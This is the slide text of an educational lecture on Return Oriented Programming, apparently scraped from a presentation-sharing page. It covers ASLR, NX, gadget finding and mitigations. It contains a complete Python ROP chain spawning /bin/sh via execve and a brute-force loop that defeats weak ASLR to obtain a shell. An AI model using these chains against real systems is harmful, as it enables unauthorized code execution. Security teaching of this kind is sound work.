"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 

Return Oriented Programming - ROP

  • 1. An introduction to the Return Oriented Programming and ROP chain generation Why and How Keywords: ROP Intel / ARM, Tools, ROP chain generation, gadgets' semantics, ASLR and NX internal, JOP, SOP, BROP, SROP, example with CVE-2011-1938
  • 2. Road-map ● Classical attacks without any security – Stack overflow exploitation in 2009 ● Mitigation against these classical attacks – Address space layout randomization – Not eXecute Bit ● ROP introduction – What is the ROP? – Why use the ROP? – How can we find gadgets? – Tools which can help you ● Real example – CVE-2011-1938 exploitation ● Mitigation against ROP attacks ● ROP variants – JOP, SOP, BROP, SROP ● Some cool research subjects – The gadgets semantics – Rop chain generation ● Conclusion ● References
  • 3. Classical attacks without any security ● Find the bug ● Try to control the program counter register ● Store your shellcode somewhere in memory ● Set the program counter register to point on your shellcode – Shellcode executed → you win
  • 4. Classical attacks without any security ● Classical stack buffer overflow – Control the saved EIP – Overwrite the SEIP with an address pointing to your code
  • 5. Mitigation against these classical attacks ● Address Space Layout Randomization ● No eXecute bit ● There are other protections but we won't describe them in this lecture – ASCII Armor – FORTIFY_SOURCE – SSP
  • 6. Address Space Layout Randomization ● Map your Heap and Stack randomly – At each execution, your Heap and Stack will be mapped at different places – It's the same for shared libraries and VDSO ● So, now you cannot jump on an hardened address like in a classical attacks (slide 4)
  • 7. Address Space Layout Randomization - Example ● Two executions of the same binary : 009c0000-009e1000 rw-p 00000000 00:00 0 [heap] 7fff329f5000-7fff32a16000 rw-p 00000000 00:00 0 [stack] 7fff32bde000-7fff32bdf000 r-xp 00000000 00:00 0 [vdso] 01416000-01437000 rw-p 00000000 00:00 0 [heap] 7fff2fa70000-7fff2fa91000 rw-p 00000000 00:00 0 [stack] 7fff2fb1c000-7fff2fb1d000 r-xp 00000000 00:00 0 [vdso]
  • 8. Address Space Layout Randomization – Linux Internal ● Heap and Stack areas mapped at a pseudo- random place for each execution
  • 9. No eXecute bit ● NX bit is a CPU feature – On Intel CPU, it works only on x86_64 or with Physical Address Extension (PAE) enable ● Enabled, it raises an exception if the CPU tries to execute something that doesn't have the NX bit set ● The NX bit is located and setup in the Page Table Entry
  • 10. No eXecute bit – Paging Internals
  • 11. No eXecute bit – PTE Internal ● The last bit is the NX bit (exb) – 0 = disabled – 1 = enabled
  • 12. ROP Introduction ● When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC Buchanan, E.; Roemer, R.; Shacham, H.; Savage, S. (October 2008) ● Return-Oriented Programming: Exploits Without Code Injection - Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Retrieved 2009-08-12.
  • 13. ROP definition ● Chain gadgets to execute malicious code. ● A gadget is a suite of instructions which end by the branch instruction ret (Intel) or the equivalent on ARM. – Intel examples: ● pop eax ; ret ● xor ebx, ebx ; ret ● Objective: Use gadgets instead of classical shellcode – ARM examples: ● pop {r4, pc} ● str r1, [r0] ; bx lr
  • 14. A gadget can contain other gadgets ● Because x86 instructions aren't aligned, a gadget can contain another gadget. ● Doesn't work on RISC architectures like ARM, MIPS, SPARC... f7c7070000000f9545c3 → test edi, 0x7 ; setnz byte ptr [rbp-0x3d] ; c7070000000f9545c3 → mov dword ptr [rdi], 0xf000000 ; xchg ebp, eax ; ret
  • 15. Why use the ROP? ● Gadgets are mainly located on segments without ASLR and on pages marked as executables – It can bypass the ASLR – It can bypass the NX bit -
  • 16. Road-map attack ● Find your gadgets ● Store your gadgets addresses on the stack – You must to overwrite the saved eip with the address of your first gadget
  • 17. CALL and RET semantics (Intel x86) ● CALL semantic ESP ← ESP – 4 [ESP] ← NEXT(EIP) ; sEIP EIP ← OPERANDE ● RET semantic TMP ← [ESP] ; get the sEIP ESP ← ESP + 4 ; Align stack pointer EIP ← TMP ; restore the sEIP
  • 18. Attack process on x86 ● Gadget1 is executed and returns ● Gadget2 is executed and returns ● Gadget3 is executed and returns ● And so on until all instructions that you want are executed ● So, the real execution is: pop eax xor edx, edx inc ecx
  • 19. Attack process on ARM ● This is exactly the same process but this time using this kind of gadgets: pop {r3, pc} mov r0, r3 ; pop {r4, r5, r6, pc} pop {r3, r4, r5, r6, r7, pc} ● On ARM it's possible to pop a value directly in the program counter register (pc)
  • 20. How can we find gadgets? ● Several ways to find gadgets – Old school method : objdump and grep ● Some gadgets will be not found: Objdump aligns instructions. – Make your own tool which scans an executable segment – Use an existing tool
  • 21. Tools which can help you ● Rp++ by Axel Souchet [3] ● Ropeme by Long Le Dinh [4] ● Ropc by patkt [5] ● Nrop by Aurelien wailly [6] ● ROPgadget by Jonathan Salwan [7]
  • 22. ROPgadget tool ● ROPgadget is : – A gadgets finder and “auto-roper” – Written in Python – Using Capstone engine – Support PE, ELF, Mach-O formats – Support x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures
  • 23. ROPgadget tool – Quick example ● Display available gadgets $ ./ROPgadget.py --binary ./test-suite-binaries/elf-Linux-x86-NDH-chall 0x08054487 : pop edi ; pop ebp ; ret 8 0x0806b178 : pop edi ; pop esi ; ret 0x08049fdb : pop edi ; ret [...] 0x0804e76b : xor eax, eax ; pop ebx ; ret 0x0806a14a : xor eax, eax ; pop edi ; ret 0x0804aae0 : xor eax, eax ; ret 0x080c8899 : xor ebx, edi ; call eax 0x080c85c6 : xor edi, ebx ; jmp dword ptr [edx] Unique gadgets found: 2447
  • 24. ROPgadget tool – ROP chain generation in 5 steps ● Step 1 - Write-what-where gadgets – Write “/bin/sh” in memory ● Step 2 - Init syscall number gadgets – Setup execve syscall number ● Step 3 - Init syscall arguments gadgets – Setup execve arguments ● Step 4 - Syscall gadgets – Find syscall interrupt ● Step 5 - Build the ROP chain – Build the python payload int execve(const char *filename, char *const argv[], char *const envp[]); ● Objective :
  • 25. Step 1 Write-what-where gadgets ● The edx register is the destination ● The eax register is the content ● xor eax, eax is used to put the null byte at the end - Step 1 -- Write-what-where gadgets [+] Gadget found: 0x80798dd mov dword ptr [edx], eax ; ret [+] Gadget found: 0x8052bba pop edx ; ret [+] Gadget found: 0x80a4be6 pop eax ; ret [+] Gadget found: 0x804aae0 xor eax, eax ; ret
  • 26. Step 2 Init syscall number gadgets ● xor eax, eax is used to initialize the context to zero ● inc eax is used 11 times to setup the exceve syscall number - Step 2 -- Init syscall number gadgets [+] Gadget found: 0x804aae0 xor eax, eax ; ret [+] Gadget found: 0x8048ca6 inc eax ; ret
  • 27. Step 3 Init syscall arguments gadgets ● int execve(const char *filename, char *const argv[], char *const envp[]); – pop ebx is used to initialize the first argument – pop ecx is used to initialize the second argument – pop edx is used to initialize the third argument - Step 3 -- Init syscall arguments gadgets [+] Gadget found: 0x8048144 pop ebx ; ret [+] Gadget found: 0x80c5dd2 pop ecx ; ret [+] Gadget found: 0x8052bba pop edx ; ret
  • 28. Step 4 Syscall gadget ● int 0x80 is used to raise a syscall exception - Step 4 -- Syscall gadget [+] Gadget found: 0x8048ca8 int 0x80
  • 29. Step 5 - Build the ROP chain p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080a4be6) # pop eax ; ret p += '/bin' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a4) # @ .data + 4 p += pack('<I', 0x080a4be6) # pop eax ; ret p += '//sh' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08048144) # pop ebx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080c5dd2) # pop ecx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca8) # int 0x80
  • 30. Mitigation against the ROP attack ● Linux - Position-Independent Executable – Applies the ASLR on the section .text ● Can be bypassed on old specific 32bits-based Linux distribution – PIC (Position-Independent Code) is used for library when a binary is compiled with PIE ● On Windows, ASLR can include the section .text
  • 31. ASLR – Entropy not enough on certain old distribution ● Tested on a ArchLinux 32 bits in 2011 – NX enable – ASLR enable – PIE enable – RELRO full ● If you don't have enough gadgets : – Choose yours in the libc – Brute-force the base address
  • 32. PIC/PIE – Entropy not enough on certain old distribution base_addr = 0xb770a000 p = "a" * 44 # execve /bin/sh generated by RopGadget v3.3 p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00178020) # @ .data p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret p += "/bin" [...] ● Brute-force the base address
  • 33. PIC/PIE – Entropy not enough on certain old distribution [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault [...] Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault sh-4.2$ ● Wait for a few seconds
  • 34. ROP variants ● Jump Oriented Programming ● String Oriented Programmng ● Blind Return Oriented Programming ● Signal Return Oriented Programming
  • 35. Conclusion ● The ROP is now a current operation and it's actively used by every attackers ● There is yet a lot of research around this attack like: – ROP mitigation (heuristic, etc...) – ROP chain generation – Smart gadgets finding – Etc...
  • 36. References ● [1] http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html ● [2] http://cseweb.ucsd.edu/~hovav/dist/sparc.pdf ● [3] https://github.com/0vercl0k/rp ● [4] http://ropshell.com/ropeme/ ● [5] https://github.com/pakt/ropc ● [6] https://github.com/awailly/nrop ● [7] http://shell-storm.org/project/ROPgadget/ ● [8] https://www.comp.nus.edu.sg/~liangzk/papers/asiaccs11.pdf ● [9] https://www.lst.inf.ethz.ch/research/publications/PPREW_2013/PPREW_2013.pdf ● [10] http://www.scs.stanford.edu/brop/bittau-brop.pdf ● [11] https://labs.portcullis.co.uk/blog/ohm-2013-review-of-returning-signals-for-fun-and-profit/ ● [12] http://shell-storm.org/repo/Notepad/ROP-chain-generation-via-backtracking-and-state-machine.txt